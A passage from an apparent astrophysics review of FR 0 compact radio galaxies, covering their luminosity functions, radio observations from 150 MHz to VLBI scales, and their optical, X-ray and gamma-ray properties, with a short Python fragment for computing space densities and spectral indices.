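    Returns bin centres, space density per luminosity bin [Mpc^-3] (divide by
    the 0.4 dex bin width for a per-dex density) and a simple Poisson
    uncertainty (rho / sqrt(N)), as a rough stand-in for Condon (1989) errors.
    """
    logL = np.asarray(logL, dtype=float)
    vmax_allsky = np.asarray(vmax_allsky, dtype=float)
    centres, rho, err = [], [], []
    for lo, hi in zip(bin_edges[:-1], bin_edges[1:]):
        sel = (logL >= lo) & (logL < hi)
        # Eq. (2): Phi(log L) = (4*pi / sigma) * sum_i 1/Vmax_i
        phi = (4.0 * np.pi / sky_area_sr) * np.sum(1.0 / vmax_allsky[sel])
        n = sel.sum()
        centres.append(0.5 * (lo + hi))
        rho.append(phi)
        err.append(phi / np.sqrt(n) if n > 0 else np.nan)
    return np.array(centres), np.array(rho), np.array(err)
```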
Quantitatively, FR 0s represent the bulk of the RLAGN population of the local Universe (\(z<0.05\)), with a space density \(\sim\)4.5 times higher than that of FR Is and \(\sim\)100 times higher than that of FR IIs. In relation to the luminosity function of ETGs, compact sources consistent with a FR 0 morphology are found in more than 60% of the giant (K-band magnitude \(\leq-25\)) ETGs detected by LOFAR with 150-MHz luminosity \(\geq 10^{21}\) W Hz\({}^{-1}\) (Capetti et al., 2022).

## 5 Radio properties

The radio band uniquely characterises the FR 0s as RL CRSs which lack substantial extended radio emission. In this section, we focus on the radio properties of FR 0s and of RL CRSs in general. We provide an overview of the continuum observations from different telescopes at different frequencies (from 150 MHz to the mm band) and resolutions (from arcsec to milli-arcsec scales) to probe the physical mechanisms acting at various linear scales along the putative jet. Most studies of CRSs reported in the next sub-sections refer to low-\(z\) sources (unless stated otherwise) and typically to LERGs.

### Low resolution

#### 5.1.1 GHz-band: sub/arcsec-scale with VLA

Thanks to the large availability of shallow radio data in the \(\sim\)1-5 GHz band, the VLA has been the first telescope used to select and characterise the properties of FR 0s. In fact, owing to their large sky coverage, moderately high resolution and sensitivity, the FIRST and NVSS 1.4-GHz surveys have been largely exploited to select CRSs and RGs in general in the local Universe, but beyond these data the radio information was extremely limited. Later, follow-up VLA observations of 25 FR 0s at 1.4, 4.5, and 7.5 GHz revealed that two thirds still appear compact at the angular resolution of 0.3\({}^{\prime\prime}\) (a few hundred parsec) and with a flat radio spectrum in the GHz band (Baldi et al., 2015, 2019). Only a third of the sample exhibits twin or one-sided jets extended on a scale of \(\sim\)2-14 kpc (see Fig. 2 as an example). The apparent radio compactness of most FR 0s at kpc scales could be caused by the fact that jet emission is below the surface brightness limit of most large-scale radio surveys. In fact, Shabala et al. (2017) demonstrated that VLBI-scale compact AGN could have lobes and plumes too faint to be detected by most surveys with the VLA and LOFAR. The absence of substantial extended jet emission, whether due to observational effects (insufficient sensitivity to detect diffuse jets on larger scales) or to intrinsic reasons (intermittent jet activity, young radio activity, intrinsic jet inefficiency, see Sect. 8 and 12), represents the characteristic feature of the FR 0 class and its uniqueness with respect to the other classes of RGs. Wide-area GHz-band surveys also revealed a large fraction of low-power CRSs, e.g., \(\sim\)93% in the VLA-COSMOS Large Project at 3 GHz (Bondi et al., 2018; Vardoulaki et al., 2021). 
These FR 0s candidates are associated with less massive hosts \(\sim 10^{10.8}\,M_{\odot}\), with lower radio powers (\(\lesssim 10^{22}\,{\rm W\,Hz}^{-1}\) \begin{table} \begin{tabular}{c c c c c c c c} \hline \(\log\)\(L_{\rm 1.4GHz}\) & FR0CAT & \multicolumn{2}{c}{sFRICAT} & FRICAT & FRIICAT \\ erg s\({}^{-1}\) & N & \(\log_{10}\)\(\rho\) & N & \(\log_{10}\)\(\rho\) & N & \(\log_{10}\)\(\rho\) & N & \(\log_{10}\)\(\rho\) \\ \hline 38.0–38.4 & 6 & \(-5.64^{+0.15}_{-0.23}\) & 0 & – & 0 & – & 0 & – \\ 38.4–38.8 & 27 & \(-5.55^{+0.08}_{-0.10}\) & 0 & – & 0 & – & 0 & – \\ 38.8–39.2 & 48 & \(-5.70^{+0.06}_{-0.07}\) & 1 & \(<-7.58^{+0.51}_{-0.51}\) & 0 & – & 0 & – \\ 39.2–39.6 & 14 & \(-6.84^{+0.10}_{-0.14}\) & 8 & \(-7.19^{+0.13}_{-0.20}\) & 3 & \(-7.82^{+0.24}_{-0.59}\) & 1 & \(<-9.86^{+0.51}_{-0.23}\) \\ 39.6–40.0 & 8 & \(-7.60^{+0.13}_{-0.19}\) & 4 & \(-8.13^{+0.20}_{-0.39}\) & 32 & \(-7.29^{+0.07}_{-0.09}\) & 7 & \(-9.39^{+0.15}_{-0.23}\) \\ 40.0–40.4 & 1 & \(<-9.97^{+0.51}_{-0.51}\) & 1 & \(<-9.60^{+0.51}_{-0.51}\) & 91 & \(-7.28^{+0.05}_{-0.05}\) & 19 & \(-9.54^{+0.10}_{-0.12}\) \\ 40.4–40.8 & 0 & – & 0 & – & 70 & \(-7.94^{+0.05}_{-0.06}\) & 36 & \(-9.82^{+0.07}_{-0.09}\) \\ 40.8–41.2 & 0 & – & 0 & – & 19 & \(-9.06^{+0.09}_{-0.12}\) & 34 & \(-10.39^{+0.07}_{-0.09}\) \\ 41.2–41.6 & 0 & – & 0 & – & 4 & \(-10.29^{+0.20}_{-0.39}\) & 16 & \(-11.40^{+0.10}_{-0.13}\) \\ 41.6–42.0 & 0 & – & 0 & – & 0 & – & 9 & \(-12.23^{+0.13}_{-0.19}\) \\ 42.0–42.4 & 0 & – & 0 & – & 0 & – & 1 & \(<-13.52^{+0.51}_{-0.51}\) \\ \hline \end{tabular} \end{table} Table 2: The local NVSS radio luminosity functions at 1.4 GHz for FR0CAT, sFRICAT, FRICAT and FRIICAT (LERG) sources. The first column shows the range of 1.4 GHz radio luminosities (erg s\({}^{-1}\)) considered in each bin. The \(N\) columns give the total number of radio sources and \(\log_{10}\)\(\rho\) their space density (number per \(\log_{10}L\) per Mpc\({}^{3}\), see Fig. 5). and at higher redshifts (median \(z\sim 1.0\)) than the FR0CAT sources. In the Very Large Array Sky Survey (VLASS; Lacy et al. 2020) at 3 GHz, Nyland et al. (2020) selected \(\sim\)2000 compact RGs, but the redshift information is not well characterised for the entire sample. The selected CRSs in these surveys consists of a heterogeneous population of AGN with red and blue colours, consistent with genuine FR 0s, star-forming galaxies, RQAGN and blazars. Furthermore, Koziel-Wierzbowska et al. (2020) found that \(\sim\)90% of the optical SDSS galaxies at \(z<0.5\) with a FIRST counterpart appear compact with \(L_{1.4\,\rm GHz}\sim 10^{21}\) - \(10^{26}\) W Hz\({}^{-1}\), hosted typically by ellipticals, a similar result to the work by Baldi and Capetti (2010). Other GHz-band studies on core-dominated LINERs with moderate radio-loudness hosted in ETGs (e.g. Nagar et al. 2000; Filho et al. 2000, 2002; Verdoes Kleijn et al. 2002; Filho et al. 2004; Kharb et al. 2012; Singh et al. 2015; Dullo et al. 2018; Zajacek et al. 2019; Singh et al. 2019) strengthen the result that nearby elliptical galaxies tend to power RL LLAGN with galactic-scale jet structures, in analogy to FR 0 galaxies. #### 5.1.2 High-frequency up to mm-band Interferometric observations at \(\nu\gtrsim 5\) GHz have the advantage of isolating better the compact optically-thick flat-spectrum core. In fact, at high frequencies the Australia Telescope Compact Array (ATCA) played an important role in the early studies of FR 0s. Sadler et al. 
(2014) have cross-matched the Australia Telescope 20 GHz (AT20G) Survey with the optical spectroscopic 6dF Galaxy Survey (6dFGS; Jones et al. 2009) to produce a volume-limited sample of 202 high-frequency CRSs associated with local galaxies (at a median \(z\sim 0.06\)) with 20-GHz flux density limit of 40 mJy. The angular resolution 10--15\({}^{\prime\prime}\) corresponds to a projected linear size of 10-15 kpc. Chhetri et al. (2013) used data from the longest (6 km) ATCA baseline to determine how much of the radio emission seen by the AT20G survey arose in very compact components. They showed that generally almost all their 20 GHz radio emission comes from a central source \(\lesssim 0.2^{\prime\prime}\) and almost half of the AT20G sources have flat radio spectra at 1--20 GHz. The selected FR 0s represent the dominant population (\(\sim\)70--75%) of the AT20G-6dFGS catalogue at radio powers between \(\sim\)10\({}^{22}\) and 10\({}^{26}\) W Hz\({}^{-1}\) in the local Universe. In addition, the high-frequency selected FR 0s consist of a heterogeneous population in terms of both optical AGN types (75% LERGs, 25% HERGs) and host galaxy types (67% ETGs, 33% LTGs). Further studies of these 20-GHz CRSs confirmed that the flat-spectrum AT20G objects sources tend to preserve a similar spectral shape in polarisation and are hosted in bluer galaxies than standard ETGs (Chhetri et al., 2012, 2020; Massardi et al., 2011). Whittam et al. (2016) and Whittam et al. (2020) selected a complete sample of 96 faint (\(>0.5\) mJy) RGs from the Tenth Cambridge (10C) survey at 15.7 GHz including LERGs and HERGs, mostly, within \(z\sim 3\). Sixty-five sources are unresolved in the 610-MHz GMRT radio observations, placing an upper limit on their angular size of \(\sim 2^{\prime\prime}\). The majority of these sources have flat spectra and are core dominated. The selected FR 0 population is the most abundant in the subset of sources with 15.7-GHz flux densities \(<\)1 mJy, extending the results of Sadler et al. (2014) at higher redshifts, \(z\sim 1\). Baldi et al. (in preparation) observed 25 FR0CAT sources at 15 GHz with the Arcminute Microkelvin Imager (AMI) telescope with an angular resolution of \(\sim 30^{\prime\prime}\), previously observed with VLA by Baldi et al. (2015) and Baldi et al. (2019). The sources appear all unresolved and extend the spectral flatness of the FR0CAT SED at higher frequencies. Mikhailov and Sotnikova (2021, 2021) conducted quasi-simultaneous radio observations of 34 FR 0s up to 22.3 GHz with the single-dish radio telescope RATAN-600 operating in transit mode with resolution varying from 11 to \(80^{\prime\prime}\). Quasi-simultaneous spectra in the range 2 - 8.2 GHz are generally flat (\(\alpha<0.5\)), but with a larger spread in the spectral index at higher frequencies. The key result is that some FR 0s demonstrate a variability level of up to 25% on a time scale of 1 year. In the mm-band, a systematic study of FR 0s is still missing. Nevertheless, first studies on mm-band continuum observations of a sample of nearby ETGs and LLAGN found compact nuclear emission (on a scale 3-7\({}^{\prime\prime}\)), showing flat or inverted spectra consistent with the scenario of small jets powered by RIAF discs (e.g. Doi et al., 2011; Marti-Vidal and Muller, 2017; Chen et al., 2023). 
ALMA continuum observations of bright CRSs (Bonato et al., 2018, 2019; Kawamuro et al., 2022) reveal the presence of a minor population of flat-spectrum radio sources (possibly similar to FR 0s) in opposition to the abundant class of blazars. #### 5.1.3 Low frequency Low-frequency observations (\(<1\) GHz) have the advantage of probing the synchrotron-aged plasma and the optically-thin emission from an extended diffuse jet, crucial to test the duty cycles of FR 0s. Using the data release of the TIFR (Tata Institute of Fundamental Research) GMRT Sky Survey (TGSS), Capetti et al. (2019) studied the low-frequency properties of 43 FR 0 galaxies (FR0CAT, with 150-MHz flux densities \(>\) 17.5 mJy) at 150 MHz at a resolution of \(\sim 25^{\prime\prime}\) (corresponding to 10 and 25 kpc). No extended emission has been detected around the detected FR 0s, corresponding to a luminosity limit of \(\lesssim 4\times 10^{23}\) W Hz\({}^{-1}\) over an area of 100 kpc \(\times\) 100 kpc. The majority of the FR 0s have a flat or inverted SED (150 MHz - 1.4 GHz, \(\alpha<0.5\)): this spectral behavior confirms the general paucity of optically thin extended emission within the TGSS beam. By focusing on a sub-sample of FR 0s with 1.4-GHz flux densities \(>50\) mJy and including 5-GHz data from the Green Bank survey (Gregory et al., 1996), the authors found that \(\sim\)75% of them have a slightly convex radio spectrum, with a smaller curvature than powerful GPS sources. The typical FR 0 radio spectrum is better described by a gradual steepening toward high frequencies, rather than a transition from an optically-thick to an optically-thin regime as seen in young RGs. Dedicated deep radio surveys on well-studied fields, such as ELIAS-N1, have also detected large numbers of compact RGs: GMRT observations at 610 MHz (Ishwara-Chandra et al., 2020) and 325 MHz (Sirothia et al., 2009) found CRSs with a median spectral index of \(\sim\)0.85 between 610 and 1400 MHz (Ishwara-Chandra et al., 2020). The flat-spectrum sources, which are expected to be core-dominated, represent the FR 0 candidates. The vast majority, \(\sim\)70%, of the radio sources in the LOFAR Two-metre Sky Survey (LoTSS, Shimwell et al. 2017, 2019; Hardcastle et al. 2019) appear compact at 150 MHz with 6'' resolution, consistent with a FR 0 classification. Capetti et al. (2020) explored in details the LOFAR properties of the FR0CAT sources. Most of the objects still appear point-like structures with sizes of \(\lesssim\)3-6 kpc. However, \(\sim\)18% of the FR 0s present resolved emission of low surface brightness, usually with a jetted morphology extending between 15 and 50 kpc. No extended emission is detected around the rest of FR 0s, with a typical luminosity limit of \(\sim 5\times 10^{22}\,\mathrm{W\,Hz}^{-1}\) over an area of 100 kpc \(\times\) 100 kpc. The spectral slopes of FR 0s between 150 MHz and 1.4 GHz span a broad range (\(-0.7\lesssim\alpha\lesssim 0.8\)) with a median value of \(\alpha\sim 0.1\); only 20% of them have a steep spectrum (\(\alpha\gtrsim 0.5\)), which is an indication of the presence of diffuse emission confined within the spatial resolution limit. The fraction of FR 0s showing evidence for the presence of jets, by including both spectral and morphological information, is \(\sim\)40%. 
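The spectral classification used above reduces to a two-point spectral index between 150 MHz and 1.4 GHz, with the \(S_{\nu}\propto\nu^{-\alpha}\) convention adopted in this review; a minimal sketch, with illustrative flux densities, follows.

```python
import numpy as np

def spectral_index(s1_mJy, nu1_GHz, s2_mJy, nu2_GHz):
    """Two-point spectral index alpha with the S_nu ~ nu^-alpha convention
    used throughout this review (alpha > 0.5: steep; alpha < 0.5: flat or
    inverted)."""
    return -np.log(s2_mJy / s1_mJy) / np.log(nu2_GHz / nu1_GHz)

# Example: a source with 20 mJy at 150 MHz and 15 mJy at 1.4 GHz
alpha = spectral_index(20.0, 0.15, 15.0, 1.4)   # ~0.13, i.e. a flat spectrum
print(f"alpha(150 MHz - 1.4 GHz) = {alpha:.2f}")
```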
In conclusion, the GMRT and LOFAR study of the FR 0s corroborates the result on the absence of extended emission in most of the sources, even in the few hundred MHz regime, where optically-thin jet emission is expected to dominate over the core component, as seen in classical large-scale RLAGN. Figure 6: EVN image at 5 GHz, spectral index map and jet proper motions of one FR 0 from Cheng et al. (2021) from left to right panel. The grey-coloured ellipse in the bottom-left corner of each panel denotes the restoring beam. The spectral index maps (spectral index colour coded in the left palette) are obtained by using the EVN 5 and 8 GHz data. The proper motions of jet components are determined by the linear fit to the component positions as a function of time. Images reproduced with permission from Cheng et al. (2021), copyright by the author(s). ### High resolution The VLBI technique enables to access to the pc-scale radio emission, a crucial region to study the jet properties of FR 0s closer to the launching site. Cheng and An (2018) and Cheng et al. (2021) studied a sample of FR 0s with worldwide VLBI, the American Very Long Baseline Array (VLBA) and European VLBI Network (EVN) and found resolved jets of a few pc for \(\sim\)80% of the sample (Cheng and An, 2018; Cheng et al., 2021) (see Fig. 6 as an example). The VLBI multi-epoch data and the symmetry of the radio structures indicate that the jet bulk speeds are mildly relativistic (between 0.08\(c\) and 0.51\(c\)) with low bulk Lorentz factors (between 1.7 and 6) and large viewing angles. However, these VLBI-based studies focused on particularly bright FR 0s (flux densities \(>\) 50 mJy, a factor 10 higher than the typical FR0CAT flux selection threshold, Baldi et al. 2018) with radio power 10\({}^{23}\) - 10\({}^{24}\) W Hz\({}^{-1}\). Recent VLBI studies also target less luminous FR 0s. Giovannini et al. (2023) studied pc-scale emission of 18 FR0CAT objects observed with the VLBA at 1.5 and 5 GHz and/or with the EVN at 1.7 GHz with flux densities a factor several lower than those of the FR 0s studied by Cheng and An (2018) and Cheng et al. (2021). All sources have been detected but one with radio core power down to 10\({}^{21}\) W Hz\({}^{-1}\). Four sources remain unresolved at pc scale, while highly-symmetric jets have been detected in all other sources. High-resolution observations carried out with the eMERLIN UK-wide array for a sample of 5 FR 0s at 5 GHz, reaching a resolution of \(\sim\)40 mas show sub-mJy core components (Baldi et al., 2021). The pc-scale core emission contributes, on average, to 3-6% of the total radio emission measured at kpc scale from NVSS maps, although an increasing core contribution for flat/inverted-spectrum sources is evident. VLBI studies of FR 0s clearly demonstrate the jet-to-counter-jet flux ratios of FR 0s are significantly smaller that those of 3C/FR Is (Baldi et al., 2021; Giovannini et al., 2023), supporting the picture that jet bulk velocities in the FR 0s are lower (see Sect. 8 for further discussion). Apart from the cases (\(\sim\)30%) where the VLBI core emission is higher than previous low-resolution data, possibly due to source variability and/or an inverted/peculiar radio spectrum, mas-scale radio emission is typically up to half of arcsec-scale core emission unresolved with VLA (Cheng and An, 2018; Cheng et al., 2021; Baldi et al., 2021; Giovannini et al., 2023). This suggests that a large fraction of emission is missed by moving from kpc to pc scale emission. Baldi et al. 
Baldi et al. (2021) combined, for the first time, the visibility datasets of the eMERLIN and VLA in the same band for five low-power FR 0s (Baldi et al., 2015) in order to probe the intermediate scales of the jet length. This procedure turned out to be successful in detecting pc-scale jets for 4 objects, which were missing in the two original datasets (see Fig. 7 for an example) because they were unresolved in the VLA maps and resolved out in the eMERLIN maps. We can thus conclude that FR 0s, although apparently lacking extended emission, are indeed able to launch pc-scale jets, whose small size and low brightness make them hard to isolate and detect. The combination of long and short baselines represents a powerful tool to study the jet properties of the FR 0 population. In conclusion, VLBI studies of FR 0s reveal the presence of pc-scale jets, generally more symmetric than those of FR Is, flowing with mildly relativistic jet bulk speeds. These results are in line with VLBI observations of nearby low-power LINERs (e.g. Ulvestad and Ho 2001b; Falcke et al. 2000; Filho et al. 2002a; Nagar et al. 2002a).

### Radio SED

To reconstruct the typical broad-band radio SED of a FR 0, we collect the multi-frequency radio data from MHz to GHz for the FR0CAT objects, available from low and high frequency surveys and single dish observations. Figure 8 depicts the mean radio SED (black solid line) from 150 MHz to 22 GHz with \(1\sigma\) dispersion (considering only detections). The main result is the overall flat spectral index (\(-0.011<\alpha<0.025\)), which confirms the general tendency of the FR 0 population to lack an optically-thin component throughout these frequencies. The mean FR 0 radio SED is flatter than the typical one derived for classical RLAGN, \(\sim-0.6\) - \(-0.7\) (Elvis et al., 1994), even selecting the low-z sample of RLAGN (Shang et al., 2011). Non-thermal self-absorbed synchrotron emission from the base of a core-dominated jet is most probably responsible for the observed spectral flatness. At higher resolution, the (GHz-band) radio SED of the pc-scale cores is as flat as those derived from low-resolution radio observations (Fig. 6, Cheng and An 2018; Cheng et al. 2021). The jet components resolved with VLBI appear weak and have steeper spectra than those of the cores, \(\sim-1\) - \(-2\). This result confirms the small contribution of the extended optically-thin jetted emission to the total radio emission in FR 0s (i.e. high core dominance) and, indeed, sub-kpc scale jets can typically emerge from radio maps with hybrid angular resolution (e.g., combining short and long baselines) or with deep VLBI observations.

Figure 7: The 5-GHz map of one FR 0 (J2336+0004) observed with the eMERLIN array (resolution \(\sim\)40 mas) and its 4.9-GHz map (resolution \(\sim\)60 mas), obtained by combining eMERLIN and VLA visibilities. The filled area, shown at the bottom-left corner of the images, represents the restoring beam of the maps. Images reproduced from Baldi et al. (2021a), copyright by the author(s).

## 6 Optical and infrared properties

In the optical band, the continuum and spectral information of genuine FR 0s is mostly limited to the SDSS data. For the FR0CAT host galaxies, the optical absolute magnitude distribution covers the range \(-21\lesssim M_{\rm r}\lesssim-23\), corresponding to masses \(\sim 10^{10-11}\,M_{\odot}\), consistent with massive ETGs, as also inferred from the infrared colours.
Instead, from the nuclear point of view, a study of the optical and IR accretion-related emission of FR 0s, in analogy to what has been done with the Hubble Space Telescope for nearby 3C/FR Is (Chiaberge et al., 1999; Baldi et al., 2010), is still missing. The lack of a proper optical nuclear power estimate forces one to adopt the optical galaxy emission as an upper limit on the optical AGN emission. Considering the 5-mJy radio flux cut of the FR0CAT sample, the radio-loudness parameter of the FR0CAT sources is \(>11\).

Figure 8: The mean radio spectra (L\({}_{\nu}\) vs \(\nu\)) of FR 0s from the FR0CAT (Baldi et al., 2018) from 150 MHz to 22.3 GHz. The data are taken: 150 MHz from Capetti et al. (2019, 2020a); 1.4 GHz from the FIRST survey (Becker et al., 1995); 4.5–5 GHz from VLA data (Baldi et al., 2019a) and the Green Bank 6-cm survey (GB6, Gregory et al. 1996); 7.5–8.2 GHz from the VLA (Baldi et al., 2019a) and the RATAN-600 telescope (Mikhailov and Sotnikova, 2021b); 11.2 and 22.3 GHz from the RATAN-600 telescope (Mikhailov and Sotnikova, 2021b). The colour filled area represents the 1 \(\sigma\) distribution of the population. The numbers show the spectral indices in the 5 frequency segments (L\({}_{\nu}\sim\nu^{\alpha}\)) and are all consistent with a flat spectrum.

An optical-band quantity which is widely used to characterise the AGN emission is the [O III]\(\lambda\)5007 emission line, which is produced by continuum radiation from the accretion disc or jet that photoionises and heats the ambient gas. Since it is easily observed and largely available from SDSS spectra, its luminosity is usually used as a proxy of the bolometric AGN power (Heckman et al., 2004) (see Sect. 8 for details and caveats). While the line luminosities of FR 0s do not correlate with the total radio luminosities (as also found for CoreG, but in contrast to classical RLAGN; upper panel, Fig. 9), they do correlate with the radio core luminosities, once the sub-arcsec core emission is resolved. In fact, FR 0s lie on the radio-line correlation valid for FR Is and CoreG (Baldi et al., 2015, 2019a) (lower panel, Fig. 9).

Figure 9: Upper panel: NVSS vs. [O III] line luminosity (erg s\({}^{-1}\)). The small points correspond to the SDSS/NVSS sample selected by Best and Heckman (2012). The solid line represents the correlation between line and radio luminosity derived for the 3C/FR I sample (green stars) (Baldi et al., 2019). The dotted lines include the region where RQAGN (Seyferts) are found. The filled circles are FR 0s studied with the VLA by Baldi et al. (2019) and the empty pink triangles are the CoreG. Lower panel: VLA radio core (5 GHz) vs [O III] line luminosity (erg s\({}^{-1}\)) for 3C/FR Is, FR 0s and CoreG; the dashed line represents their common radio-optical luminosity correlation.

This common core-[O III] relation valid for LERG-type RGs (FR 0s, FR Is, FR IIs) is generally interpreted as a measurement of non-thermal radiation from the jet base at different bands (see Sect. 8, e.g. Hardcastle and Worrall 2000; Baldi et al. 2019a). Since the [O III] line is mostly isotropic, this shared correlation implies that the radio compactness of FR 0-like RGs is not due to geometric effects and also sets a universal accretion-ejection coupling at the nuclear level for all LERG-type RGs. Similarly, Miraghaei and Best (2017) found that compact RGs have an \(L_{\rm[O~{}III]}\) distribution analogous to that of extended RGs, \(10^{39}\)-\(10^{40}\,\rm erg\,s^{-1}\), when matched in radio core luminosities.
Conversely, the total radio luminosity of the FR 0s and CoreG does not scale with the AGN bolometric luminosity, as it does for LERG FR Is and FR IIs (Buttiglione et al., 2010); instead, a strong deficit of total radio emission with respect to the 3C/FR Is (not due to orientation), by a factor of 100-1000 at the same AGN power, is notable. This shortage of total jet power suggests a lower jet efficiency of FR 0s than that of the other RLAGN classes (see Sect. 8 for a deeper discussion). The high detection rates of optical and IR nuclei and the lack of evidence for thermal emission at IR wavelengths have been interpreted as indicating the absence of a dusty torus in 3C/FR Is and generally in LERGs (e.g. Chiaberge et al. 1999; Leipski et al. 2009; Baldi and Capetti 2010; van der Wolk et al. 2010; Antonucci 2012; Dicken et al. 2014; Tadhunter 2016a). This scenario has also been applied to LINER-like LLAGN in general (FR 0s included), which show optical and IR characteristics similar to those of FR Is (e.g. Ho 2008; Muller-Sanchez et al. 2013), consistent with a luminosity-dependent model of a torus that disappears at very low accretion rates (Elitzur and Shlosman, 2006; Balmaverde and Capetti, 2015; Gonzalez-Martin et al., 2015).

## 7 High-energy properties

The study of the high-energy (HE, \(>\)0.1 keV) properties of jetted AGN can help to investigate the accretion and ejection mechanisms in action. The current and upcoming generations of HE detectors are revolutionising our picture of how the engines at the centres of RLAGN are able to launch plasma at relativistic speeds and extend their spectra to very-high energies (up to TeV, Rani 2019; Rulten 2022). In addition, the detection of HE emission and neutrinos associated with low-luminosity, misaligned AGN and BL Lacs (e.g., Abdo et al. 2010; IceCube Collaboration et al. 2018, 2022; Torresi 2020) has opened a new window on the physics of particle acceleration and jets even in AGN with less extreme conditions than those expected in powerful blazars. FR 0s, \(\sim\)4.5 times more numerous than FR Is in the local Universe (\(z<0.05\)), represent potentially interesting targets at high and very-high energies (from X-ray to TeV) and could make a non-negligible contribution to the extragalactic HE background (Stecker et al., 2019). Here we discuss the HE properties (from keV to TeV) of FR 0s, in analogy with the review by Baldi et al. (2019c).

### X-ray

The X-ray emission represents an optimal proxy to study the accretion properties of active BHs, because the keV band can probe the HE photons produced by the corona and disc. Torresi et al. (2018) performed the first systematic study in the X-ray (2-10 keV) band of a sample of 19 nearby FR 0s selected from Best and Heckman (2012), for which X-ray data were available in the public archives of the _XMM-Newton_, _Chandra_ and _Swift_ satellites. Their FIRST 1.4-GHz flux densities (\(>\)30 mJy) are higher than those of the FR0CAT sources. Torresi et al. (2018) found that the X-ray spectra of these FR 0s are generally well represented by a power law with \(\Gamma\sim\) 1.9 absorbed by the Galactic column density and do not require an additional intrinsic absorber, confirming the optical-IR results on the absence of a dusty torus, similar to 3C/FR Is (e.g. Donato et al., 2004; Balmaverde et al., 2006). In some cases, the addition of a thermal component is required by the data: this soft X-ray emission could be related to the extended intergalactic medium or to the hot corona typical of nearby ETGs (Fabbiano et al., 1992).
The X-ray luminosities of FR 0s, \(L_{\rm X}\), range between \(10^{40}\) and \(10^{43}\) erg s\({}^{-1}\), similar to those of 3C/FR Is (Balmaverde et al., 2006; Hardcastle and Worrall, 2000). When the X-ray luminosity is compared to that of the radio core, a statistically significant correlation is established (Fig. 10), valid for FR Is and FR 0s. This result corroborates the common interpretation that the X-ray emission in low-power RGs, FR 0s, FR Is and LERGs in general, has a non-thermal origin from the jet (e.g. Balmaverde and Capetti 2006b; Hardcastle and Worrall 2000; Hardcastle et al. 2009).

Figure 10: X-ray (2–10 keV) luminosity versus 5-GHz radio core luminosity for FR 0s (black circles) from the SDSS/NVSS sample and 3C/FR Is (red squares). Arrows indicate upper limits. The black solid line is the linear regression for the overall sample of FR 0s and FR Is, excluding the upper limits. The black dashed lines represent the 1\(\sigma\) uncertainties on the slope. Image reproduced with permission from Torresi et al. (2018), copyright by the author(s).

The X-ray luminosities of FR 0s also support the idea that the central engine of FR 0s is powered by a sub-Eddington RIAF-type disc, \(\dot{L}_{E}\sim 10^{-3}\) - \(10^{-5}\), analogous to 3C/FR Is and different from powerful 3C/FR IIs (HERGs) (Baum et al., 1995; Evans et al., 2006; Hardcastle et al., 2009). Since the study of Torresi et al. (2018) is slightly biased towards high-luminosity FR 0s, a dedicated study of the accretion properties with deep Chandra data would be required for a statistical confirmation.

### Gamma-ray

Gamma rays (\(>100\) keV) are generally produced under extreme relativistic conditions and offer a unique view of the physical mechanisms in jet launching and propagation (Blandford et al., 2019; Hada, 2019). In such a band, blazars are known to be the most luminous class of \(\gamma\)-ray emitters and have been thoroughly studied (Abdollahi et al., 2022). Conversely, the HE properties of low-luminosity and misaligned AGN are generally less explored than those of their luminous counterparts, because of their lower flux densities (Abdo et al., 2010; Angioni et al., 2017; Rieger and Levinson, 2018; de Menezes et al., 2020). In fact, there are only a few cases of \(\gamma\)-ray detection of FR 0s in the literature. Grandi et al. (2016) claimed the first Fermi \(\gamma\)-ray detection of a FR 0, Tol 1326-379, with a GeV luminosity of \(2\times 10^{42}\) erg s\({}^{-1}\), similar to FR Is. Its radio-GeV SED is double-peaked (Maraschi et al., 1992), similar to other jet-dominated RLAGN (Fig. 11, see the SEDs of M87, Abdo et al. 2009, and Cen A, H.E.S.S. Collaboration et al. 2020), where non-thermal synchrotron and inverse-Compton emission dominate in every band over the disc and host emission. While the GeV luminosity is in line with the detections of local FR Is, the prominent Compton peak, brighter than the synchrotron one, makes this source similar to flat-spectrum radio quasars, whereas the steep \(\gamma\)-ray spectrum makes it more similar to low-luminosity BL Lacs.

Figure 11: Multi-band SED (from radio to \(\gamma\)-ray) of the Fermi-detected FR 0, Tol 1326-379 (red symbols) compared to those of two nearby prototype FR Is, HE emitters: Cen A (green) and M 87 (blue). The dotted lines are polynomial functions connecting the data-points and do not represent model fits to data. Image reproduced with permission from Grandi et al. (2016), copyright by the author(s).
Nevertheless, the best scenario which can reproduce the whole SED is a misaligned RG which emits synchrotron and synchrotron self-Compton radiation with a total energy flux of the order of a few \(10^{44}\,\mathrm{erg\,s^{-1}}\) (Grandi et al., 2016). Later, Paliya (2021) reported the \(\gamma\)-ray identification of three other FR 0s from the FR0CAT above 1 GeV using more than a decade of Fermi Large Area Telescope (LAT) observations. By stacking large existing datasets, other FR 0 candidates and compact core-dominated RGs have recently been claimed to be detected (Best and Bazo, 2019; de Menezes et al., 2020). In addition, based on the sensitivities of upcoming MeV-TeV telescopes, a significant population of low-luminosity RGs emitting at HE will be unearthed in the near future (Baldi et al., 2019; Balmaverde et al., 2020). In fact, it has been estimated that nearby core-dominated RGs (FR 0s and CoreG) can account for \(\sim\)4%-18% of the unresolved \(\gamma\)-ray background below 50 GeV observed by the LAT instrument on-board _Fermi_ (Stecker et al., 2019; Harvey et al., 2020). Unfortunately, no FR 0s have been listed among the non-blazar AGN in the recently released Fourth LAT AGN Catalog (4LAC, Abdollahi et al. 2020; Ajello et al. 2022) and the \(\gamma\)-ray identification of Tol 1326-379 has also been questioned (Fu et al., 2022). In addition, Tavecchio et al. (2018) proposed that FR 0s can accelerate HE protons in the jet and be powerful enough to sustain neutrino production detectable by the IceCube experiment, above several tens of TeV (Jacobsen et al., 2015). Merten et al. (2021, 2022) argued that FR 0 jets can generate ultra-high-energy cosmic rays through stochastic shear acceleration up to \(\sim 10^{18}\) - \(10^{19}\) eV (Lundquist et al., 2022). In contrast, Mbarek and Caprioli (2021) argued that the bulk Lorentz factors of FR 0 jets, lower than those of FR I/IIs, could disfavour their HE emission in general. In conclusion, although HE studies of FR 0s are still sparse, the main result is that FR 0s and FR Is share common X-ray and \(\gamma\)-ray properties, suggesting similar generic accretion and ejection phenomena in the vicinity of the BH (e.g. accretion disc properties and relativistic acceleration of particles at GeV energies in the jet).

## 8 Accretion and ejection

